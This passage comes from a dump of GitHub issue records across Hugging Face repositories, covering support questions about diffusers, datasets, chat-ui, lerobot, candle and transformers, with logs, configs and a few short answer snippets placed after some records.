/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1527): _call_impl\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1518): _wrapped_call_impl\\n  /usr/local/lib/python3.10/dist-packages/diffusers/models/transformers/transformer_2d.py(440): forward\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1527): _call_impl\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1518): _wrapped_call_impl\\n  /usr/local/lib/python3.10/dist-packages/diffusers/models/unets/unet_2d_blocks.py(1288): forward\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1527): _call_impl\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1518): _wrapped_call_impl\\n  /usr/local/lib/python3.10/dist-packages/diffusers/models/unets/unet_2d_condition.py(1220): forward\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1527): _call_impl\\n  /usr/local/lib/python3.10/dist-packages/torch/nn/mod",
    "url": "https://github.com/huggingface/diffusers/issues/8626",
    "state": "closed",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2024-06-18T18:06:37Z",
    "updated_at": "2024-09-23T11:36:10Z",
    "comments": 11,
    "user": "chrismaltais"
  },
  {
    "repo": "huggingface/datasets",
    "number": 6979,
    "title": "How can I load partial parquet files only?",
    "body": "I have a HUGE dataset about 14TB, I unable to download all parquet all. I just take about 100 from it.\r\n\r\ndataset = load_dataset(\"xx/\", data_files=\"data/train-001*-of-00314.parquet\")\r\n\r\nHow can I just using 000 - 100 from a 00314 from all partially?\r\n\r\nI search whole net didn't found a solution, **this is stupid if they didn't support it, and I swear I wont using stupid parquet any more**\r\n",
    "url": "https://github.com/huggingface/datasets/issues/6979",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-18T15:44:16Z",
    "updated_at": "2024-06-21T17:09:32Z",
    "comments": 12,
    "user": "lucasjinreal"
  },
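`data_files` accepts a list (or glob patterns), so the first 100 shards can be enumerated explicitly. A sketch; the repo ID is a placeholder, since the issue elides it:

```python
from datasets import load_dataset

# Enumerate the first 100 of the 314 shards by name; shard indices are
# zero-padded to five digits in the usual `train-XXXXX-of-00314` scheme.
files = [f"data/train-{i:05d}-of-00314.parquet" for i in range(100)]
dataset = load_dataset("xx/dataset-name", data_files=files, split="train")  # placeholder repo id
```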
  {
    "repo": "huggingface/pytorch-image-models",
    "number": 2211,
    "title": "How to Replicate Official Model Accuracy",
    "body": "Based on the accuracy provided by the official source, how can one replicate and train these models? \r\n\r\nFor example, for mobilenetv4_hybrid_large.e600_r384_in1k with a top-1 accuracy of 84.266\r\n\r\nwhere can one find the training hyperparameters such as epochs, scheduler, warmup epochs, learning rate, batch size, and other parameters to replicate the model's performance?",
    "url": "https://github.com/huggingface/pytorch-image-models/issues/2211",
    "state": "closed",
    "labels": [
      "enhancement"
    ],
    "created_at": "2024-06-18T05:30:59Z",
    "updated_at": "2024-06-24T23:36:45Z",
    "user": "usergxx"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1290,
    "title": "ERROR:    Exception in ASGI application",
    "body": "Hello everyone, I have the following problem when using Huggingface ChatUI with FastChat. How can I change the configuration? Use npm to start development mode.\r\nThanks\r\n```\r\nMODELS=`[\r\n  {\r\n    \"name\": \"Infinirc-7b-Llama2\",\r\n    \"id\": \"Infinirc-7b-Llama2\",\r\n    \"model\": \"Infinirc-7b-Llama2\",\r\n    \"parameters\": {\r\n      \"temperature\": 0.9,\r\n      \"top_p\": 0.95,\r\n      \"repetition_penalty\": 1.2,\r\n      \"top_k\": 50,\r\n      \"truncate\": 1000,\r\n      \"max_new_tokens\": 1024,\r\n      \"stop\": []\r\n    },\r\n    \"endpoints\": [{\r\n      \"type\" : \"openai\",\r\n      \"baseURL\": \"http://69.30.85.183:22152/v1\",\r\n      \r\n      \"accessToken\": \"x\"\r\n\r\n    }]\r\n  }\r\n]`\r\n```\r\n\r\nFastChat:\r\n```\r\n`2024-06-18 01:07:42 | INFO | stdout | INFO:     59.125.15.126:60166 - \"POST /v1/chat/completions HTTP/1.1\" 500 Internal Server Error\r\n2024-06-18 01:07:42 | ERROR | stderr | ERROR:    Exception in ASGI application\r\n2024-06-18 01:07:42 | ERROR | stderr | Traceback (most recent call last):\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/uvicorn/protocols/http/httptools_impl.py\", line 399, in run_asgi\r\n2024-06-18 01:07:42 | ERROR | stderr |     result = await app(  # type: ignore[func-returns-value]\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/uvicorn/middleware/proxy_headers.py\", line 70, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     return await self.app(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/fastapi/applications.py\", line 1054, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     await super().__call__(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/applications.py\", line 123, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     await self.middleware_stack(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/middleware/errors.py\", line 186, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     raise exc\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/middleware/errors.py\", line 164, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     await self.app(scope, receive, _send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/middleware/cors.py\", line 85, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     await self.app(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/middleware/exceptions.py\", line 65, in __call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     await wrap_app_handling_exceptions(self.app, conn)(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/_exception_handler.py\", line 64, in wrapped_app\r\n2024-06-18 01:07:42 | ERROR | stderr |     raise exc\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/_exception_handler.py\", line 53, in wrapped_app\r\n2024-06-18 01:07:42 | ERROR | stderr |     await app(scope, receive, sender)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/routing.py\", line 756, in 
__call__\r\n2024-06-18 01:07:42 | ERROR | stderr |     await self.middleware_stack(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/routing.py\", line 776, in app\r\n2024-06-18 01:07:42 | ERROR | stderr |     await route.handle(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/routing.py\", line 297, in handle\r\n2024-06-18 01:07:42 | ERROR | stderr |     await self.app(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/routing.py\", line 77, in app\r\n2024-06-18 01:07:42 | ERROR | stderr |     await wrap_app_handling_exceptions(app, request)(scope, receive, send)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/_exception_handler.py\", line 64, in wrapped_app\r\n2024-06-18 01:07:42 | ERROR | stderr |     raise exc\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/_exception_handler.py\", line 53, in wrapped_app\r\n2024-06-18 01:07:42 | ERROR | stderr |     await app(scope, receive, sender)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/starlette/routing.py\", line 72, in app\r\n2024-06-18 01:07:42 | ERROR | stderr |     response = await func(request)\r\n2024-06-18 01:07:42 | ERROR | stderr |   File \"/usr/local/lib/python3.10/dist-packages/fastapi/routing.py\", line 278, in app\r\n2024-06-18 01:07:42 | ERROR | stderr |     raw_response = await run_endpoint_function(\r\n2024-06-18 01:07:42 | ERRO",
    "url": "https://github.com/huggingface/chat-ui/issues/1290",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2024-06-18T02:07:50Z",
    "updated_at": "2024-06-23T13:26:59Z",
    "comments": 1,
    "user": "rickychen-infinirc"
  },
  {
    "repo": "huggingface/autotrain-advanced",
    "number": 684,
    "title": "Where is the fine-tuned model output?",
    "body": "I\u2019m new to using AutoTrain on Hugging Face and I encountered an issue during my first attempt at fine-tuning a model. I have a free account, because I want to see whether I can get something to work before I start paying for training. Here\u2019s a summary of what I did and the problem I\u2019m facing:\r\nTraining Configuration:\r\nI trained using Mistral-7B-Instruct-v0.2 and also openai-community/gpt2.\r\nDataset: I uploaded a tiny JSONL file (24 records) with a single \u201ctext\u201d field for training.\r\nTraining Parameters: I set the training to run for one epoch.\r\nTraining Process:\r\nThe training ran for a couple of seconds.\r\nI received a message that the space was paused, which I assumed meant the training had completed.\r\nIssue:\r\nAfter the training supposedly completed, I can\u2019t find any output files or trained models.\r\nI checked all available tabs and sections in the AutoTrain interface but didn\u2019t see anything labeled \u201cModels,\u201d \u201cArtifacts,\u201d \u201cResults,\u201d or similar.\r\nI reviewed the logs but didn\u2019t find any clear indications of where the output is stored.\r\nI checked my Hugging Face profile under the \u201cModels\u201d heading, but it says \u201cNone yet.\u201d\r\nQuestions:\r\nWhere should I look in the AutoTrain interface to find the trained model and output files?\r\nAre there any additional steps I need to take to ensure the trained model is saved and accessible?\r\nWith a free account, I don\u2019t have any GPUs assigned. But is that a problem with only 24 short training samples and one epoch?\r\nAny guidance or tips would be greatly appreciated!\r\n",
    "url": "https://github.com/huggingface/autotrain-advanced/issues/684",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-17T23:01:53Z",
    "updated_at": "2024-06-22T03:49:27Z",
    "user": "RonPisaturo"
  },
  {
    "repo": "huggingface/transformers",
    "number": 31453,
    "title": "How to build and evaluate a vanilla transformer?",
    "body": "### Model description\n\n\"Attention Is All You Need\" is a landmark 2017 research paper authored by eight scientists working at Google, responsible for expanding 2014 attention mechanisms proposed by Bahdanau et al. into a new deep learning architecture known as the transformer with an encoder, cross-attention, and a decoder.\n\n### Open source status\n\n- [X] The model implementation is available\n- [ ] The model weights are available\n\n### Provide useful links for the implementation\n\nEncoderDecoderModels are supported via the huggingface API. Though it isn't possible to evaluate them properly: https://github.com/huggingface/transformers/issues/28721\r\nHow is it possible to build and evaluate a vanilla transformer with an encoder, cross-attention, and a decoder in huggingface?",
    "url": "https://github.com/huggingface/transformers/issues/31453",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-17T17:17:11Z",
    "updated_at": "2024-11-04T13:56:06Z",
    "user": "Bachstelze"
  },
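A minimal sketch of building an encoder/decoder transformer with cross-attention via `EncoderDecoderModel`; this warm-starts from BERT for brevity, though randomly initialized configs work the same way:

```python
from transformers import BertTokenizerFast, EncoderDecoderModel

tokenizer = BertTokenizerFast.from_pretrained("bert-base-uncased")

# Ties an encoder and a decoder (with cross-attention layers added) together.
model = EncoderDecoderModel.from_encoder_decoder_pretrained(
    "bert-base-uncased", "bert-base-uncased"
)
model.config.decoder_start_token_id = tokenizer.cls_token_id
model.config.pad_token_id = tokenizer.pad_token_id

# Evaluation can then go through model.generate() plus any seq2seq metric.
```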
  {
    "repo": "huggingface/parler-tts",
    "number": 74,
    "title": "How to do with flan-t5 when i want to finetune based on  Mini v0.1 but not from scratch? Flan t5 can not deal my language.",
    "body": "",
    "url": "https://github.com/huggingface/parler-tts/issues/74",
    "state": "open",
    "labels": [],
    "created_at": "2024-06-17T06:39:24Z",
    "updated_at": "2024-06-17T06:39:24Z",
    "user": "lyt719"
  },
  {
    "repo": "huggingface/candle",
    "number": 2269,
    "title": "How to select which GPU to use",
    "body": "We are working with the stable diffusion example. How do we select which GPU device on our system to use for the rendering?\r\nthanks.",
    "url": "https://github.com/huggingface/candle/issues/2269",
    "state": "open",
    "labels": [],
    "created_at": "2024-06-16T19:53:18Z",
    "updated_at": "2024-06-21T19:29:31Z",
    "user": "donkey-donkey"
  },
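Programmatically, candle devices are created from a CUDA ordinal (`Device::new_cuda(index)`); at the process level the standard CUDA environment variable works too. A sketch, assuming the example is built with the cuda feature (the flags follow the repo's example invocations and may differ by version):

```shell
# Expose only the second GPU to the process; inside it, ordinal 0 maps to it.
CUDA_VISIBLE_DEVICES=1 cargo run --example stable-diffusion --release --features cuda -- --prompt "a rusty robot"
```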
  {
    "repo": "huggingface/chat-ui",
    "number": 1283,
    "title": "SELF_SIGNED_CERT_IN_CHAIN",
    "body": "I am experiencing this error. I'm on a corporate VPN and I tried turning it off and still the same error. The TLS reject is set to false as well.\r\n\r\nSELF_SIGNED_CERT_IN_CHAIN\u202871.61 \r\nnpm error errno SELF_SIGNED_CERT_IN_CHAIN\u202871.61 \r\nnpm error request to https://registry.npmjs.org/failed, reason: self-signed certificate in certificate chain",
    "url": "https://github.com/huggingface/chat-ui/issues/1283",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2024-06-14T04:03:48Z",
    "updated_at": "2024-06-17T06:50:29Z",
    "comments": 2,
    "user": "solanki-aman"
  },
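The usual fix on a corporate network is to point npm and Node at the corporate root CA rather than disabling verification. A sketch; the certificate path is a placeholder for your exported corporate certificate:

```shell
# Trust the corporate root CA for npm and for Node itself.
npm config set cafile /path/to/corporate-root-ca.pem   # placeholder path
export NODE_EXTRA_CA_CERTS=/path/to/corporate-root-ca.pem
npm install
```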
  {
    "repo": "huggingface/diffusers",
    "number": 8527,
    "title": "how to add controlnet in sd3!",
    "body": "I currently use inpainting controlnet in sdxl because it uses unet to easily support controlnet. And I am curious about how to add controlnet in sd3 with transforms model structure.",
    "url": "https://github.com/huggingface/diffusers/issues/8527",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-13T10:14:38Z",
    "updated_at": "2024-08-24T04:20:28Z",
    "user": "appleyang123"
  },
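SD3 ControlNet support landed in Diffusers shortly after this was filed, with the conditioning injected into the transformer blocks rather than a UNet. A sketch using one of the publicly released InstantX checkpoints; the control image path is a placeholder:

```python
import torch
from diffusers import SD3ControlNetModel, StableDiffusion3ControlNetPipeline
from diffusers.utils import load_image

controlnet = SD3ControlNetModel.from_pretrained(
    "InstantX/SD3-Controlnet-Canny", torch_dtype=torch.float16
)
pipe = StableDiffusion3ControlNetPipeline.from_pretrained(
    "stabilityai/stable-diffusion-3-medium-diffusers",
    controlnet=controlnet,
    torch_dtype=torch.float16,
).to("cuda")

image = pipe(
    "a photo of a living room, interior design",
    control_image=load_image("canny_edges.png"),  # placeholder control image
    controlnet_conditioning_scale=0.7,
).images[0]
```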
  {
    "repo": "huggingface/lerobot",
    "number": 266,
    "title": "Question - how to handle additional sensory input",
    "body": "Hi guys, sorry to bother you again :wink:  \r\nand thanks for your work, I'm very excited by Lerobot!\r\n\r\n\r\nI'm currently collecting some teleop data where the robot has tactile sensors on the fingertips, as well as a FT sensor on the wrist and I was wondering how I would integrate this best into a Lerobot Dataset.\r\n\r\nOne way would be to concatenate them into the `observation.state`, as this is the hardcoded location for non-image observations. But I want to train both with and without the tactile sensors and FT sensors as inputs to quantify the benefits of the other sensors, so I would then have to make separate datasets for each sensor combination which feels cumbersome. \r\n\r\nAre there any plans in the near future to support 'dynamic configuration' of the state inputs for the policies? Or is my best option to just create different datasets for each combination?\r\n\r\n\r\n",
    "url": "https://github.com/huggingface/lerobot/issues/266",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2024-06-13T08:39:26Z",
    "updated_at": "2025-10-23T02:29:29Z",
    "user": "tlpss"
  },
  {
    "repo": "huggingface/nanotron",
    "number": 196,
    "title": "how to run benchmark tests",
    "body": "Hi, \r\n\r\nI can build this project with your commands, but there is no \"pyaottriton\" when ran the benchmark test like: benchmark_forward.py or benchmark_backward.py.\r\n\r\nanything I missed?\r\n\r\nThanks",
    "url": "https://github.com/huggingface/nanotron/issues/196",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-13T08:31:06Z",
    "updated_at": "2024-06-13T08:38:24Z",
    "user": "jinsong-mao"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1277,
    "title": "Difficulties with chat-ui promp to text-generation-webui openai api endpoint",
    "body": "Hello,\r\n\r\nI'm trying my best to get the huggingface ```chat-ui``` working with the API endpoint of ```text-generation-webui```.\r\n\r\nI would be really happy if I could get a hint what I am doing wrong.\r\n\r\nHere is a reverse proxied test instance: https://chat-ui-test.pischem.com/\r\n\r\nI can't get my prompt that I input into the chat-ui to pass to the text-generation-webui. Every prompt will be ignored and a random answer is returned.\r\n\r\nHere is the command I start ```text-generation-webui```:\r\n\r\n
\r\n\r\n```./start_linux.sh --listen --listen-port 8000 --api --api-port 8001 --verbose --model NTQAI_Nxcode-CQ-7B-orpo```\r\n\r\n
\r\n\r\nHere is my current ```.local.env``` of the ```chat-ui``` and the command I run it with:\r\n\r\n
\r\n\r\n```npm run dev -- --host```\r\n\r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"text-generation-webui\",\r\n \"id\": \"text-generation-webui\",\r\n \"parameters\": {\r\n \"temperature\": 0.9,\r\n \"top_p\": 0.95,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": []\r\n },\r\n \"endpoints\": [{\r\n \"type\" : \"openai\",\r\n \"baseURL\": \"http://172.16.0.169:8001/v1\",\r\n \"extraBody\": {\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000\r\n }\r\n }]\r\n }\r\n]`\r\n\r\nMONGODB_URL=`mongodb://localhost:27017`\r\nDEBUG=`true`\r\n```\r\n\r\n
\r\n\r\nHere are the logs what happen when I write a prompt:\r\n\r\n```chatui```:\r\n\r\n
\r\n\r\n```\r\n> chat-ui@0.9.1 dev\r\n> vite dev --host\r\n\r\n\r\n\r\n VITE v4.5.3 ready in 777 ms\r\n\r\n \u279c Local: http://localhost:5173/\r\n \u279c Network: http://172.16.0.135:5173/\r\n \u279c Network: http://172.17.0.1:5173/\r\n \u279c press h to show help\r\n(node:6250) [DEP0040] DeprecationWarning: The `punycode` module is deprecated. Please use a userland alternative instead.\r\n(Use `node --trace-deprecation ...` to show where the warning was created)\r\n[13:58:52.476] INFO (6250): [MIGRATIONS] Begin check...\r\n[13:58:52.478] INFO (6250): [MIGRATIONS] \"Update search assistants\" already applied. Skipping...\r\n[13:58:52.478] INFO (6250): [MIGRATIONS] \"Update deprecated models in assistants with the default model\" should not be applied for this run. Skipping...\r\n[13:58:52.478] INFO (6250): [MIGRATIONS] \"Add empty 'tools' record in settings\" already applied. Skipping...\r\n[13:58:52.478] INFO (6250): [MIGRATIONS] \"Convert message updates to the new schema\" already applied. Skipping...\r\n[13:58:52.478] INFO (6250): [MIGRATIONS] \"Convert message files to the new schema\" already applied. Skipping...\r\n[13:58:52.478] INFO (6250): [MIGRATIONS] \"Trim message updates to reduce stored size\" already applied. Skipping...\r\n[13:58:52.478] INFO (6250): [MIGRATIONS] All migrations applied. Releasing lock\r\n[13:58:52.498] INFO (6250): Metrics server listening on port 5565\r\nBrowserslist: caniuse-lite is outdated. Please run:\r\n npx update-browserslist-db@latest\r\n Why you should do it regularly: https://github.com/browserslist/update-db#readme\r\n\r\n\r\n(node:6250) Warning: To load an ES module, set \"type\": \"module\" in the package.json or use the .mjs extension.\r\n(node:6250) Warning: To load an ES module, set \"type\": \"module\" in the package.json or use the .mjs extension.\r\nSource path: /opt/chat-ui/src/lib/components/chat/FileDropzone.svelte?svelte&type=style&lang.css\r\nSetting up new context...\r\n\r\n\r\nSource path: /opt/chat-ui/src/lib/components/chat/ChatInput.svelte?svelte&type=style&lang.css\r\n\r\n\r\nSource path: /opt/chat-ui/src/lib/components/ToolsMenu.svelte?svelte&type=style&lang.css\r\n\r\n\r\nSource path: /opt/chat-ui/src/lib/components/chat/ChatMessage.svelte?svelte&type=style&lang.css\r\nJIT TOTAL: 265.317ms\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n(node:6250) Warning: Label 'JIT TOTAL' already exists for console.time()\r\n(node:6250) Warning: Label 'JIT TOTAL' already exists for console.time()\r\n(node:6250) Warning: Label 'JIT TOTAL' already exists for console.time()\r\n(node:6250) Warning: No such label 'JIT TOTAL' for console.timeEnd()\r\n(node:6250) Warning: No such label 'JIT TOTAL' for console.timeEnd()\r\n(node:6250) Warning: No such label 'JIT TOTAL' for console.timeEnd()\r\n\r\n\r\nSource path: /opt/chat-ui/src/lib/components/OpenWebSearchResults.svelte?svelte&type=style&lang.css\r\n\r\n\r\nSource path: /opt/chat-ui/src/lib/components/chat/ToolUpdate.svelte?svelte&type=style&lang.css\r\nJIT TOTAL: 1.355ms\r\n\r\n\r\n\r\n\r\n(node:6250) Warning: Label 'JIT TOTAL' already exists for console.time()\r\n(node:6250) Warning: No such label 'JIT TOTAL' for console.timeEnd()\r\n\r\n\r\nSource path: /opt/chat-ui/src/styles/main.css\r\nSetting up new context...\r\nFinding changed files: 8.775ms\r\nReading changed files: 158.906ms\r\nSorting candidates: 7.72ms\r\nGenerate rules: 397.398ms\r\nBuild stylesheet: 11.899ms\r\nPotential classes: 8755\r\nActive contexts: 2\r\nJIT TOTAL: 767.815ms\r\n\r\n\r\n\r\n\r\nSource path: 
/opt/chat-ui/src/styles/main.css?inline=\r\nSetting up new context...\r\nFinding changed files: 3.466ms\r\nReading changed files: 119.942ms\r\nSorting candidates: 7.852ms\r\nGenerate rules: 339.343ms\r\nBuild stylesheet: 6.497ms\r\nPotential classes: 8755\r\nActive contexts: 3\r\nJIT TOTAL: 635.226ms", "url": "https://github.com/huggingface/chat-ui/issues/1277", "state": "closed", "labels": [ "support" ], "created_at": "2024-06-12T14:18:12Z", "updated_at": "2025-01-30T18:46:22Z", "comments": 7, "user": "Monviech" }, { "repo": "huggingface/chat-ui", "number": 1275, "title": "Feature Request - support for session sharing, archiving, and collaboration", "body": "AFAIK, HuggingChat (HC) currently has no support for session sharing, archiving, and collaboration. At least, neither the HC server nor my GitHub (GH) searching found anything like this. So, if this doesn't exist, please consider how it could be implemented. For example, if I wanted to publish an HC session, maybe I could ask HC to send me a transcript in a form suitable for sharing (e.g., as a GH repo). To reduce friction, perhaps I could simply ask HC to create (or update) a repo.\r\n\r\nMaking it easy for HC users (and researchers) to examine and/or collaborate on sessions seems to me to be a Good Thing...", "url": "https://github.com/huggingface/chat-ui/issues/1275", "state": "open", "labels": [ "question" ], "created_at": "2024-06-12T11:35:31Z", "updated_at": "2024-06-14T05:24:08Z", "user": "RichMorin" }, { "repo": "huggingface/lerobot", "number": 263, "title": "Seeking advice on how to choose between ACT and DP algorithms", "body": "Hello,\r\n\r\nThank you very much for the work you have done in bringing together the current excellent imitation learning collections for convenient use. Regarding the ACT algorithm and DP algorithm, besides the basic differences in the algorithms themselves, how should one choose between them for different tasks? Do they have specific types of tasks they are particularly suited for? I have just started using your project and am unsure how to select the appropriate algorithm. I would greatly appreciate any advice you can provide.\r\n\r\nThank you!", "url": "https://github.com/huggingface/lerobot/issues/263", "state": "closed", "labels": [ "question" ], "created_at": "2024-06-12T07:45:39Z", "updated_at": "2024-06-19T14:02:43Z", "user": "le-wei" }, { "repo": "huggingface/dataset-viewer", "number": 2899, "title": "Standardize access to metrics and healthcheck", "body": "In some apps, the metrics and healthcheck are public:\r\n\r\n- https://datasets-server.huggingface.co/admin/metrics\r\n- https://datasets-server.huggingface.co/sse/metrics\r\n- https://datasets-server.huggingface.co/sse/healthcheck\r\n- https://datasets-server.huggingface.co/healthcheck\r\n- On others, it\u2019s forbidden or not found:\r\n\r\n- https://datasets-server.huggingface.co/metrics\r\n- https://datasets-server.huggingface.co/filter/metrics \r\n\r\nAs @severo suggests, it should be coherent among all the services. (Do we want the metrics to be public, or not?)\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2899", "state": "open", "labels": [ "question", "infra", "P2" ], "created_at": "2024-06-11T14:39:10Z", "updated_at": "2024-07-11T15:38:17Z", "user": "AndreaFrancis" }, { "repo": "huggingface/lerobot", "number": 261, "title": "Which low cost robot with teleoperation to test the library ?", "body": "Firstly, thank you for all the work. 
At my company we would like to obtain results on real robots from this repository. However, the original setups are either quite expensive (around ~30k for Aloha) or require reconstruction for the UMI interface from Colombia via 3D printing, which would be time-consuming considering we don't have direct experience in the subject.\r\n\r\n**Do you have any recommendations for one or more robots with a low-cost teleoperation setup on which we could test and iterate quickly on these algorithms?** I have seen some people doing things with low-cost robots on LinkedIn, and I will reach out to them, but apparently, they do not seem to be selling them.\r\n\r\nThanks,", "url": "https://github.com/huggingface/lerobot/issues/261", "state": "closed", "labels": [ "question" ], "created_at": "2024-06-11T13:21:32Z", "updated_at": "2024-07-23T07:55:15Z", "user": "RochMollero" }, { "repo": "huggingface/diarizers", "number": 11, "title": "How can I save the model locally before pushing it to the Hub ?!", "body": "", "url": "https://github.com/huggingface/diarizers/issues/11", "state": "closed", "labels": [], "created_at": "2024-06-11T06:37:45Z", "updated_at": "2024-06-13T16:24:19Z", "user": "ma-mohsen" }, { "repo": "huggingface/parler-tts", "number": 68, "title": "How to predict after finetune? There is no config.json in checkpoint dir.", "body": "", "url": "https://github.com/huggingface/parler-tts/issues/68", "state": "open", "labels": [], "created_at": "2024-06-11T03:30:04Z", "updated_at": "2024-06-17T01:57:04Z", "user": "lyt719" }, { "repo": "huggingface/transformers.js", "number": 802, "title": "Long running transcription using webgpu-whisper", "body": "### Question\r\n\r\nNoob question - the [webgpu-whisper](https://github.com/xenova/transformers.js/tree/v3/examples/webgpu-whisper) demo does real time transcription, however it doesn't build out a full transcript from the start ie. 2 mins into transcription, the first few transcribed lines disappear. \r\n\r\nTranscript at time x \ud83d\udc47 \r\n```\r\nCool, let's test this out. We'll see how this works. So turns out that the transcription when I try to access it is actually just empty. And so the only thing that actually comes through is. So yeah, so the output that's getting cut is basically coming from the\r\n```\r\n\r\nTranscript at time x+1 \ud83d\udc47 \r\n```\r\nthis out, we'll see how this works. So turns out that the transcription when I try to access it is actually just empty. And so the only thing that actually comes through is. So yeah, so the output that's getting cut is basically coming from the work\r\n```\r\n\r\nNote how the \"Cool, let's test\" is missing from the start of the second transcript. \r\n\r\nI'm wondering what it would take to keep building the transcript for a long running meeting without losing any of the previously transcribed stuff? \r\n\r\nI tried a naive appending approach and that just results in a transcript full of repetition. \r\n\r\nSo I'm very curious about what it would take to build out a streaming transcription similar to what something like [Deepgram](https://developers.deepgram.com/docs/node-sdk-streaming-transcription) would offer. Would that require a change to the pipeline? Are there models that can take an appended transcript with lots of repetition and trim it down to a clean transcript?\r\n\r\nPlease let me know if my questions are unclear. 
Just looking for some direction so that I can potentially put up a PR for this (if needed).\r\n", "url": "https://github.com/huggingface/transformers.js/issues/802", "state": "open", "labels": [ "question" ], "created_at": "2024-06-10T16:44:01Z", "updated_at": "2025-05-30T05:52:37Z", "user": "iamhitarth" }, { "repo": "huggingface/sentence-transformers", "number": 2738, "title": "How is `max_length` taken into account compared to models setting", "body": "What happens under the hood, if I set max_length > than model's max_length?\r\n\r\n\r\nit seems to work, but are inputs truncated or doi you apply RoPE-Extension?", "url": "https://github.com/huggingface/sentence-transformers/issues/2738", "state": "open", "labels": [], "created_at": "2024-06-09T15:59:09Z", "updated_at": "2024-06-10T06:45:49Z", "user": "l4b4r4b4b4" }, { "repo": "huggingface/datasets", "number": 6961, "title": "Manual downloads should count as downloads", "body": "### Feature request\n\nI would like to request that manual downloads of data files from Hugging Face dataset repositories count as downloads of a dataset. According to the documentation for the Hugging Face Hub, that is currently not the case: https://huggingface.co/docs/hub/en/datasets-download-stats\n\n### Motivation\n\nThis would ensure that downloads are accurately reported to end users.\n\n### Your contribution\n\nN/A", "url": "https://github.com/huggingface/datasets/issues/6961", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-06-09T04:52:06Z", "updated_at": "2024-06-13T16:05:00Z", "comments": 1, "user": "umarbutler" }, { "repo": "huggingface/diffusers", "number": 8439, "title": "How to use EDM2 model with diffusers?", "body": "model safetensors: https://huggingface.co/RedRocket/Fluffyrock-Unbound/blob/main/Fluffyrock-Unbound-v1-1.safetensors\r\nyaml: https://huggingface.co/RedRocket/Fluffyrock-Unbound/raw/main/Fluffyrock-Unbound-v1-1.yaml\r\n\r\ncolab demo:\r\n\r\nhttps://colab.research.google.com/drive/1LSGvjWXNVjs6Tthcpf0F5VwuTFJ_d-oB\r\n\r\nresults:\r\n\r\n![Untitled](https://github.com/huggingface/diffusers/assets/151509142/50df4aae-cf88-436d-a76f-c25bda0f7e76)\r\n", "url": "https://github.com/huggingface/diffusers/issues/8439", "state": "open", "labels": [ "stale" ], "created_at": "2024-06-09T03:39:05Z", "updated_at": "2024-09-14T15:10:19Z", "user": "s9anus98a" }, { "repo": "huggingface/transformers", "number": 31323, "title": "Language modeling examples do not show how to do multi-gpu training / fine-tuning", "body": "### System Info\r\n\r\n- `transformers` version: 4.41.2\r\n- Platform: Linux-5.15.0-1042-nvidia-x86_64-with-glibc2.35\r\n- Python version: 3.9.18\r\n- Huggingface_hub version: 0.23.3\r\n- Safetensors version: 0.4.2\r\n- Accelerate version: 0.31.0\r\n- Accelerate config: \tnot found\r\n- PyTorch version (GPU?): 2.2.1+cu121 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- 